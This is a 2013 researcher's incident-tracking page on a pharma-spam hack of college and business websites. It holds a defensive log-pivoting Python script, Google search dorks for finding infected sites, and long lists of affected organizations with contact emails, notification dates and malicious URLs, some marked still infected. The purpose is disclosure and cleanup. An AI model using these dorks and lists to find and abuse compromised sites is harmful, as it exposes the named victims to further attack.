From Don Faulkner, UARK.EDU:

We saw no evidence of remote control or botnet-like behavior. The affected site did not house sensitive data.

From Jared Ehrenheim, KWC.EDU:

I've also discovered POST requests to one of the infected PHP files coming from two different Netherlands registered IP addresses: 46.249.58.18 and 95.211.111.78

I've blacklisted those, but I anticipate there are more.

46.249.58.18 is marked as a spam source by Spamhaus:

http://www.mywot.com/en/scorecard/46.249.58.18

I can't find any reports of malicious activity from 95.211.111.78

What we really could use now is a sample of the malware. PCAP files of the traffic would be good too. If anyone at infected colleges can help, please email me: sbowne@ccsf.edu
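
The KWC reply above found its controller addresses by looking at POST requests to a known infected PHP file and expected more to exist. The following is an added example, not code from KWC or from this page's author: it pivots through an Apache access log from a known infected path to the clients that POSTed to it, then to other PHP files those clients POSTed to successfully. The log lines, paths and addresses are constructed (documentation IP ranges), and the infected path is hypothetical.

```python
import re
from collections import defaultdict

# Apache/NCSA common or combined log format; only the leading fields are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)


def parse(lines):
    """Yield (ip, method, path, status) for every well-formed log line."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            path = m.group("target").split("?", 1)[0]   # drop the query string
            yield m.group("ip"), m.group("method"), path, int(m.group("status"))


def pivot(lines, known_infected):
    """Return (controller_ips, candidate_paths) for an incident responder.

    controller_ips: clients that POSTed to a file already known to be infected.
    candidate_paths: other .php files those clients POSTed to with a
    non-error status, mapped to the clients seen; each one needs inspection.
    """
    records = list(parse(lines))
    known = set(known_infected)
    controllers = {ip for ip, method, path, _ in records
                   if method == "POST" and path in known}
    candidates = defaultdict(set)
    for ip, method, path, status in records:
        if (ip in controllers and method == "POST" and path not in known
                and path.lower().endswith(".php") and status < 400):
            candidates[path].add(ip)
    return (sorted(controllers),
            {p: sorted(ips) for p, ips in sorted(candidates.items())})


# Constructed sample log. 192.0.2.50 is an ordinary visitor; the last line is
# deliberately malformed to show that unparseable lines are skipped.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Nov/2013:10:00:01 +0000] "POST /images/cache.php HTTP/1.1" 200 12 "-" "-"
198.51.100.9 - - [21/Nov/2013:10:05:44 +0000] "POST /images/cache.php?x=1 HTTP/1.1" 200 12 "-" "-"
203.0.113.7 - - [21/Nov/2013:10:06:02 +0000] "POST /wp-content/uploads/style.php HTTP/1.1" 200 5 "-" "-"
198.51.100.9 - - [21/Nov/2013:10:07:10 +0000] "POST /tmp/t.php HTTP/1.1" 404 0 "-" "-"
192.0.2.50 - - [21/Nov/2013:10:08:00 +0000] "POST /login.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.50 - - [21/Nov/2013:10:08:03 +0000] "GET /index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Nov/2013:10:09:30 +0000] "GET /about.php HTTP/1.1" 200 4000 "-" "-"
this line is truncated and must be skipped
""".splitlines()


if __name__ == "__main__":
    ips, paths = pivot(SAMPLE_LOG, ["/images/cache.php"])
    print("clients that POSTed to the known infected file:", ips)
    for path, seen in paths.items():
        print("inspect", path, "POSTed to by", seen)
```

Adding each newly confirmed file to the known list and running the pivot again widens the search one step at a time.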

11. Finding Local Businesses

I tried to find local businesses that were infected, in the hopes of analyzing an infection myself.

I used these Google searches:

"viagra online 100mg" san francisco california
viagra Canadian san francisco california
san francisco intitle:viagra
Organization Emails Malicious URL
1. 12ozprophet.com
NYC, I think
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CG4QFjAG&url=http%3A%2F%2Fwww.12ozprophet.com%2Fnews%2Fphotos_nyc_2nd_avenue_subway_construction%3Fmtjve%3D350000&ei=IDCQUsaIBc_3oASx2oHADw&usg=AFQjCNFQC18xz-rFE-3ZMXb423dWuEMJ_w&sig2=v2Q9ISoppnLGAMODwNdFtA&bvm=bv.56988011,d.cGU
2. http://www.ediblecommunities.com/
They have an office in San Francisco
ediblesanfrancisco@gmail.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFsQFjAGOAo&url=http%3A%2F%2Fwww.ediblecommunities.com%2Fcontent%2Fedible-stories.htm%3Fm%3D201008%26zwrpy%3D664050&ei=5TGQUrjkL9XroATKpIII&usg=AFQjCNF4qEKLcWjuDwsL3S4RfqAwWpkDIw&sig2=LU6d4sozjgv2fOVunTCOYQ&bvm=bv.56988011,d.cGU
3. californiarowingclub.com
Oakland
Page is infected with JS.HideMe-J [Trj] http://www.californiarowingclub.com/index.php/programs
4. hpfirefighter.com
North Carolina
http://hpfirefighter.com/2013/08/video-sheds-light-on-flight-214-passengers-death/
5. merolaopera.com
Merola Opera Program
War Memorial Opera House
301 Van Ness Avenue
San Francisco, CA 94102-4509 USA
Phone: 1.415.565.6427
Fax: 1.415.565.3254
Email: mop (at) sfopera.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFMQFjAF&url=http%3A%2F%2Fmerolaopera.com%2Fstaff&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNGhq8bXPIE0WA33s9k0Yb0pDMcMsg&sig2=WH0dfbpc94wNCNx5Oj6VvA
6. lautze.com
San Francisco Office (Main Office)
303 Second Street, Suite #950
San Francisco CA 94107
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGIQFjAH&url=http%3A%2F%2Fwww.lautze.com%2Flinks.html&ei=ejeQUq4q2OagBMGggqAG&usg=AFQjCNH44eFZ5TccxVHVJ4yumgzeIwwFYA&sig2=E8f2Qz8zEhw4ocV2wZGu0w
7. webchaver.org
NJ; a browser security product
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=25&ved=0CEcQFjAEOBQ&url=http%3A%2F%2Fwebchaver.org%2Fcanadian-online-pharmacy-viagra-no-prescription%2F&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHk15_HlSxWBiWdQ1zAINxAv4gWEg&sig2=uFh6AX5-yil6xvFuvye8nA
8. advancedhomeenergy.com
1356 S 50th St, Richmond, CA 94804
Ph: (510) 540-4860
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGYQFjAIOBQ&url=http%3A%2F%2Fwww.advancedhomeenergy.com%2Fhome&ei=YjmQUsCPNZDUoATB-4LQAQ&usg=AFQjCNHSO_MyJPjunQLz5sL9xcRWJL7U6Q&sig2=PwtC-mHr9KwnoQPBnGI9Tg
9. mixeddimensions.com
181 Fremont st., San Francisco, CA 94105
info@mixeddimensions.net

Notified 11-25-13

mixeddimensions.com/?xb=594
Not the same infection, hosted locally
10. ismrm.org
International Society for Magnetic Resonance in Medicine
2030 Addison Street, 7th Floor
Berkeley, CA 94704 USA
Tel: +1 510-841-1899
Fax: +1 510-841-2340
info@ismrm.org

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHEQFjAJOB4&url=http%3A%2F%2Fwww.ismrm.org%2F13%2Ftp09.htm&ei=0TqQUpWLJczZoASLvoDIAw&usg=AFQjCNH3Mebg6q2RERfICm_v4cLaKXas9g&sig2=fDjkigFKsFZgTbut9vp4ng
11. pinkberry.com
3130 Wilshire Blvd, 4th Floor, Santa Monica, CA 90403 https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=45&ved=0CEkQFjAEOCg&url=https%3A%2F%2Fwww.pinkberry.com%2Ffrozen-yogurt-store%2Fus%2Fca%2Flos-angeles%2F92%2Flax%3Fcglua%3D640342&ei=xjyQUuDDMNjmoATBoIKgBg&usg=AFQjCNGKOgdOmrs-gqHEkUSB-P_K5NSnAg&sig2=E9GC65JDjCFmxyPRgGsNFw
12. enterprisecontinuity.com
A cybersecurity company
DISASTER RESOURCE GUIDE | PO Box 15243, Santa Ana, CA 92735 | TEL 714.558.8940 | FAX 714.558.8901
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=115&ved=0CEYQFjAEOG4&url=http%3A%2F%2Fwww.enterprisecontinuity.com%2F%3Fceisprernte279%3Dcanadian-pharmacy-viagra-100mg&ei=pj-QUvL7IsPzoATbxIDoAw&usg=AFQjCNGQ5CC0HXNIc6q7fS0cWOpd0nE9Cg&sig2=pmBWVzx3V-qzdleRDGMLqA
13. metrostudy.com
Washington, DC
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDwQFjAC&url=http%3A%2F%2Fwww.metrostudy.com%2Fexternals%2Fskydeck-store%2Findex.php%3Fq%3Dbuy-viagra-in-san-francisco-77&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHha6MJd4ui5T4zTJYEBy-wHttktw&sig2=o9PbT6lWJhPJsSk3RtwDKQ&bvm=bv.56988011,d.cGU
14. rivnet.com
Texas
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CDQQFjAB&url=http%3A%2F%2Frivnet.com%2Ffiles%2Fbuy-viagra-in-san-francisco.html&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNE4lowkUqpEG3tZ82JcxJsakQPaVA&sig2=8lKR4_vM_K4Vl7P-q0D4DA&bvm=bv.56988011,d.cGU
15. wwpinfo.com
NJ
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0CEMQFjAD&url=http%3A%2F%2Fwww.wwpinfo.com%2F%3Fmcofoinwpw249%3Dhow-to-obtain-viagra-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEJK1yhkRK4aukYoSfoWyW4lS7BKg&sig2=Kzr3G7WSEIOkzBKh_CLwyQ&bvm=bv.56988011,d.cGU
16. www.3dogcreative.biz
Web site not up yet, but already infected
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CEoQFjAE&url=http%3A%2F%2Fwww.3dogcreative.biz%2Fwp-content%2Fwp%2F%3Fp%3D151&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGBPM1BB-Y5RHc9-W7dL9sacPs1jQ&sig2=nnhgoz27M7Sg5Y93T9fIUA&bvm=bv.56988011,d.cGU
17. columbiagreenhouse.com
NY
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0CFEQFjAF&url=http%3A%2F%2Fcolumbiagreenhouse.com%2Foldsite%2Fphotos%2F1%2F%3Ft%3D493&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHkz0Bfywio3VD3-Ynd3KpcDgOjEg&sig2=HfsekHrly84inOytQbJGrQ&bvm=bv.56988011,d.cGU
18. figurefinishing.com
VA
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGQQFjAH&url=http%3A%2F%2Ffigurefinishing.com%2F%3Fbuy-viagra-in-san-francisco&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNEZSjIa7jlpLA6HFBootnF0wi_Y0Q&sig2=oiRHrs1DuDa_Fe1dYFTDiQ&bvm=bv.56988011,d.cGU
19. xoverland.com
MT
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CGsQFjAI&url=http%3A%2F%2Fwww.xoverland.com%2Frssxvl.php%3Fl%3D92&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNGMAMJfrrAyKDMm0kDYlEC3Op-7rA&sig2=UXrgmCvBQ6HbJ05tZlStPw&bvm=bv.56988011,d.cGU
20. aaohn.org
American Association of Occupational Health Nurses, FL
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHMQFjAJ&url=http%3A%2F%2Faaohn.org%2Fpharmacy.php%3Fproduct%3D10571&ei=AMyQUp-UEcPloATa1YCgBQ&usg=AFQjCNHp1M3--3joxExUh6vcpzN88sFM1w&sig2=c0EJ8FK1aiS0T4H2pPEUBA&bvm=bv.56988011,d.cGU
21. chatsoft.com
Cloud service provider, NJ
info@chatsoft.com
Not the same defacement, notified via Twitter on 11-23-13 or 11-14-13
http://www.chatsoft.com/solutions/datamanagement/index.html
22. collin.edu
Texas
Notified 11-23-13 https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CFcQFjADOAo&url=http%3A%2F%2Fiws.collin.edu%2Fecoker%2Fimages%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNFfhzXWWc7wMkf6Oe-rUPfcjLg8Cg&sig2=9snfjkM5uPqGeol1L9p3rA&bvm=bv.56988011,d.cGU
23. yicca.org
Site by redbulconsulting.com, a Swiss consulting firm

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fyicca.org%2Frssyic.php%3Fyic%3D484&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNE4kwVB_Glliiz4KPsHgqLT03PPPQ&sig2=oahZQdHFKdpnAQIQqld3gQ&bvm=bv.56988011,d.cGU
24. nrc.ie
Dublin, Ireland
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CHAQFjAIOAo&url=http%3A%2F%2Fnrc.ie%2Fbuy-viagra-san-francisco.html&ei=886QUvqRHsvWoASUjoJo&usg=AFQjCNErTeHURaWcjumbe_vJ-FYfUIMWDA&sig2=8AeBbQTgEq5-UiWYn8jOBw&bvm=bv.56988011,d.cGU
25. flobots.com
Website by djcoffman.com
djcoffman@gmail.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CC4QFjAA&url=http%3A%2F%2Fflobots.com%2Fpfizer-viagra-discount%2F&ei=2T-RUv27OMffoAS864LAAQ&usg=AFQjCNEil6kk8PJIniIu6eVGY0_bpDDt6w&sig2=-KIeiwGbkeZWP0-rML1W1A&bvm=bv.56988011,d.cGU

12. Links to helpful resources

Why My Website Sells Viagra (2012)

Protect Your WordPress Website from a Pharma Hack (2012)

Google Viagra Hack Hitting Websites Hard

Gumblar .cn Exploit – 12 Facts About This Injected Script (2009)

Viagra ads appearing in google search results (2009)

This forum thread seems to be about an infection similar to the one I am seeing:

http://forum.avast.com/index.php?topic=131579.0

Rogues & Frauds « Canadian International Pharmacy Association

ohotdamn.com Redirects ~ canadian-pharmacy-24h.com

Buy Amitriptyline – canadian-pharmacy-24h.com

Discussion of this hacking technique from 2010

13. UK infected colleges (11-25-13)

I can't get many US colleges to talk to me, and I think it may be from fear of lawsuits, since there is no data-sharing law in the USA. I've been told things are better in Europe, and I suppose folks in NZ and AU may be less paranoid, just from my experiences with them, so I'm trying to find colleges there.

I used these Google searches:

inurl:UK intitle:viagra
inurl:uk intitle:viagra university
inurl:ac.uk intitle:viagra university
inurl:ac.uk intitle:viagra
@burrowingsec told me on Twitter about janet:

https://www.ja.net/support-advice/support/security-issues

So I notified them by email first ( service@ja.net ), rather than contacting each college individually.

That was a mistake. It is now 10 PM 11-26-13, and despite the promises at https://www.ja.net/support-advice/support/security-issues that they will respond within one or two hours, here I am, 36 hours after my first notification by email, 21 hours after @mark_s0 alerted them via Twitter, and 6 hours after my second notification by email. They have not responded to any of them, and the first 5 colleges on my list remain vulnerable. Ja.net is worse than useless, they just slow down repairs with their lies.

So I resume what I should have done in the first place, and contact the colleges directly.

Wow! That worked! The next day, 11-27-13, I tested them and 9/12 have been cleaned, apparently by deleting files or shutting off infected servers.
Organization Emails Malicious URL
1. www.targettravel.co.uk
admin@targettravel.info
abuse@targettravel.info
security@targettravel.info

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0CE4QFjAE&url=http%3A%2F%2Fwww.targettravel.co.uk%2Fviagra-uk-supplier.html&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNEPEC4Xk4UkVMHCGjYWnwDQsxRdSw&sig2=JV3uN_kNSrCny56V5LlpSw&bvm=bv.56988011,d.cGU
2. wccsj.ac.uk
Welsh Centre for Crime and Social Justice
admin@wccsj.ac.uk
abuse@wccsj.ac.uk
security@wccsj.ac.uk

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=7&ved=0CGEQFjAG&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123137&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFAk_vZczVyKhEWuX69y3X5aKtQbw&sig2=xT3Da_5LAGABDsC5kMs5sA&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=8&ved=0CGkQFjAH&url=http%3A%2F%2Fwccsj.ac.uk%2Findex.php%3Fid%3D123287&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFlM1bFAF_s1Q-cLWj_NJwbmgOVqg&sig2=2T_MpWV716UYjLoat5gbHw&bvm=bv.56988011,d.cGU

3. hip.hertford.ox.ac.uk
Oxford University
louise.turner@hertford.ox.ac.uk
security@hertford.ox.ac.uk
abuse@hertford.ox.ac.uk
andrew.hemingway@hertford.ox.ac.uk

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=10&ved=0CHgQFjAJ&url=http%3A%2F%2Fhip.hertford.ox.ac.uk%2Fviagra%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNHdQLUhdt1SJ22JS-R6jbzevjmeuQ&sig2=7Jhk36XEqaTnIeTHIHc31Q&bvm=bv.56988011,d.cGU
4. studyingeconomics.ac.uk
U. of Bristol
econ-network@bristol.ac.uk
webmaster@bristol.ac.uk
abuse@bristol.ac.uk
security@bristol.ac.uk
A.Bernays@bristol.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFYQFjAFOAo&url=http%3A%2F%2Fstudyingeconomics.ac.uk%2Fgames-and-books%2F%3Fc3r1z%3D681291&ei=BnSTUs-XC4_YoASdwYKIAg&usg=AFQjCNGkH30VSsigQhRR7A2BnvqRE9pQUA&sig2=afk7SdZWe6Oo1gyTlfYNMA&bvm=bv.57127890,bs.1,d.cGE&cad=rja
5. www.met.reading.ac.uk
U. of Reading
infosec@met.reading.ac.uk
webmaster@reading.ac.uk
secuity@reading.ac.uk
abuse@reading.ac.uk
vc@reading.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=27&ved=0CFoQFjAGOBQ&url=http%3A%2F%2Fwww.met.reading.ac.uk%2F~sws96srb%2Fuploads%2Fupload%2Flunchsem.php%3Fdc%3D1682&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNGR2z9NsMiI0DqinKezG5VkHx5cQg&sig2=kYUGqOD11Isu5_V9DQ5wJA&bvm=bv.56988011,d.cGU
6. www.cemmap.ac.uk
Economic and Social Research Council
emma_h@ifs.org.uk
abuse@ifs.org.uk
security@ifs.org.uk
websupport@esrc.ac.uk
angela.newton@esrc.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=28&ved=0CGMQFjAHOBQ&url=http%3A%2F%2Fwww.cemmap.ac.uk%2Fwps%2Fonline%2F%3Fmedic%3D42386-ViagRX-viagra-tablets-sale&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNForrP6m0Vu_-OeKWn3av0MyotYFA&sig2=BGHWJ1vpPF_iPq2pVnnQUA&bvm=bv.56988011,d.cGU
7. cardiffmet.ac.uk
Cardiff Metropolitan U.
izone@cardiffmet.ac.uk
abuse@cardiffmet.ac.uk
security@cardiffmet.ac.uk
izone@cardiffmet.ac.uk
hward@effcom.co.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=30&ved=0CHEQFjAJOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fsuperdrug-uk-viagra&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNHh4kbCHDBqSMahWEyO_aYrpAGO4w&sig2=MZGm_bGd-yJpNKUKIeSoDw&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=29&ved=0CGoQFjAIOBQ&url=http%3A%2F%2Fceramics.cardiffmet.ac.uk%2Fresources%2Fviagra-through-customs-uk&ei=y3aTUpmaNsXsoATPrIDYBg&usg=AFQjCNG-4yyKatNp9Oqt4lPHz3LXL_RWpw&sig2=JEeU5jVHROMeQx1-gtZAkw&bvm=bv.56988011,d.cGU

8. www.cranfield.ac.uk
Cranfield U.
mediarelations@cranfield.ac.uk
security@cranfield.ac.uk
abuse@cranfield.ac.uk
info@cranfield.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=15&ved=0CEsQFjAEOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D196%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNEnErjuCDaR2QXx972TvBBa4aq87g&sig2=WRD5YXEKow1RhAOvptB36A&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&ved=0CFQQFjAFOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D4%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5NMyVIYo2gzS4-PGxDUAK9b_Usw&sig2=Q_oSBJUiPpKfZM8a2OpKsw&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=17&ved=0CFwQFjAGOAo&url=http%3A%2F%2Faerade.cranfield.ac.uk%2Fimages%2Frgam%2F%3Fapiqyf%3D225%26bibywuqy%3Dviagra&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNG5C5lSb1AQBQKOmHz7gauH5UZ6gA&sig2=b4RUGCAQ_tEsEvfa7olAcw&bvm=bv.56988011,d.cGU

9. rca.ac.uk
Royal College of Art
info@rca.ac.uk
abuse@rca.ac.uk
security@rca.ac.uk
ied@rca.ac.uk
media@rca.ac.uk
publications@rca.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGUQFjAHOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F103-viagra.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNFlcmx5STMygRXNA2Rznz_h5sCm-w&sig2=4mlkERaImer88RDtorgRzw&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=19&ved=0CG0QFjAIOAo&url=http%3A%2F%2Fwww.di09.rca.ac.uk%2Fwp-content%2Fuploads%2Floenga%2F157-viagrx.html&ei=tHuTUpCEDczmoATn04LoAQ&usg=AFQjCNGWqUf_qQTZUJ2_ZrzHCXI4LyLeLw&sig2=-3aV-L0oSJ0ProTmKJx7Ig&bvm=bv.56988011,d.cGU

10. wlecentre.ac.uk
Institute of Education, London
info@ioe.ac.uk
security@ioe.ac.uk
abuse@ioe.ac.uk
security@wlecentre.ac.uk
abuse@wlecentre.ac.uk
web.editor@ioe.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

http://www.wlecentre.ac.uk/index.php/viagra-sales
11. rhul.ac.uk
Royal Holloway U. of London
iQuad@rhul.ac.uk
security@rhul.ac.uk

Notified directly 11-26-13

Cleaned 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=39&ved=0CGcQFjAIOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D2924%26what%3Dviagra%2Bsubstitute%2Buk&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNG2xt-lmlojaxdN61fFxQisWED-WA&sig2=eSsb3pwcgDh7wmgiEe2tIQ&bvm=bv.56988011,d.cGU

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHAQFjAJOB4&url=http%3A%2F%2Fwww.scc.rhul.ac.uk%2Fmwidmer%2FPublications%2F%3Fwhere%3D4387%26what%3Dviagra%2Brezeptfrei%2Bschweiz&ei=nY6TUuvcBcztoATV14CwBQ&usg=AFQjCNHXYX9HkUK2ulD5bovGZpJWfzqVdg&sig2=8OWwTRVFtQhpRyFZCIX2VA&bvm=bv.56988011,d.cGU

12. strethamschool.co.uk
Stretham Primary School
office@stretham.cambs.sch.uk
security@stretham.cambs.sch.uk
abuse@stretham.cambs.sch.uk

Notified directly 11-26-13

Still infected 11-27-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=40&ved=0CHIQFjAJOB4&url=http%3A%2F%2Fwww.strethamschool.co.uk%2Fwp-content%2Fthemes%2Fgracio%2Fview-generic_viagra_cheap_prices.NzM1.html&ei=Z6aTUuz_DsreoATXwYGoBA&usg=AFQjCNEYT325h1PVm_kWNNp6LYvXKKihJA&sig2=qRLTPj_bkD3Wywafx2HBBA&bvm=bv.56988011,d.cGU

14. Misc. Infected Sites

For now, these are the ones outside the UK I found while searching for UK sites.

I'll rearrange these as I proceed to other countries.

Organization Emails Malicious URL
1. www.iospress.nl
Science book publisher
iospress@accucoms.com
abuse@accucoms.com
security@accucoms.com
editorial@iospress.nl
security@iospress.nl
abuse@iospress.nl
http://twitter.com/IOSPress_STM

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CD8QFjAC&url=http%3A%2F%2Fwww.iospress.nl%2Forder-viagra-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNFkDnoND5tbHHzyPLXM_FYuz_oCFQ&sig2=VLGnW8AXLxJqak4N0vyIDg&bvm=bv.56988011,d.cGU
4. www.gaylea.com
Many locations, but neither US nor UK
questions@gayleafoods.com
security@gayleafoods.com
abuse@gayleafoods.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0CHEQFjAI&url=http%3A%2F%2Fwww.gaylea.com%2Fviagra-alternative-uk%2F&ei=O2iTUv2wEtTjoATEpoGwBQ&usg=AFQjCNGgwljON9etvbIadjxu1gDc7Yj_4A&sig2=6TCNwDzhv7smHlca1m95jA&bvm=bv.56988011,d.cGU

Not a redirection, hosted on their server, but only visible from Google

http://www.gaylea.com/dr-buying-viagra-online/
This one is visible directly, not just from Google.

5. www.redleafresort.com.au
reservations@redleafresort.com.au
security@redleafresort.com.au
abuse@redleafresort.com.au

Notified 11-25-13

http://www.redleafresort.com.au/fast-mail-order-viagra/

http://www.redleafresort.com.au/tag-viagra-without-prescription/

http://www.redleafresort.com.au/ed-order-viagra/

http://www.redleafresort.com.au/a-erectile-dysfunction-viagra/

http://www.redleafresort.com.au/ed-cheap-viagra-from-canada/

Visible directly, not just from Google

6. thiefandbandit.com
thiefandbandit@gmail.com

Notified 11-25-13

http://thiefandbandit.com/a-buy-viagra-in-great-britain/

Visible directly, not just from Google

7. www.petetribal.org
klaflin@maine.rr.com
sgrosse@maine.rr.com

Notified 11-25-13

http://www.petetribal.org/in-cialis-commercial/

Visible directly

8. www.cmmsmadeeasy.com
Software company in WI; site is incomplete
abuse@cmmsmadeeasy.com
security@cmmsmadeeasy.com

Notified 11-25-13

http://www.cmmsmadeeasy.com/med-cialis-super-active/

Directly visible

9. www.gaywellington.org
helpline@gaywellington.org
abuse@gaywellington.org
security@gaywellington.org

Notified 11-25-13

http://www.gaywellington.org/page-genaric-cialis/

Directly visible

11. solidifi.com
Appraisers in NY
clientsupport@solidifi.com
contactus@solidifi.com
ABUSE@solidifi.com
security@solidifi.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=11&ved=0CCsQFjAAOAo&url=http%3A%2F%2Fsolidifi.com%2Fbuy-uk-viagra%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNGmWN0VgD2blzs5ueLe2TsgaEcjpA&sig2=aayhKBmmXZ2YWipfGuL2jQ&bvm=bv.56988011,d.cGU
12. www.jessicashops.com
http://twitter.com/jessicashops
security@jessicashops.com
abuse@jessicashops.com

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=14&ved=0CEIQFjADOAo&url=http%3A%2F%2Fwww.jessicashops.com%2Fviagra-sale-uk%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNFRXa-_bfpIktfY5VO0fW_RHQvFiA&sig2=CHi2mViORBMw2DcsWP9PTg&bvm=bv.56988011,d.cGU
13. www.blonk.it
Italian book publisher
info@blonk.it
security@blonk.it
abuse@blonk.it

Notified 11-25-13

https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=18&ved=0CGgQFjAHOAo&url=http%3A%2F%2Fwww.blonk.it%2Fuk-viagra-cheap%2F&ei=3G-TUti_KsHcoASDt4DYDw&usg=AFQjCNEUwlKnBC2wn75lPhMN0MJEpIDMJA&sig2=bHI0GP1cAfS17jKGznK8-Q&bvm=bv.56988011,d.cGU
18. uns.ac.id
Indonesia
security@uns.ac.id
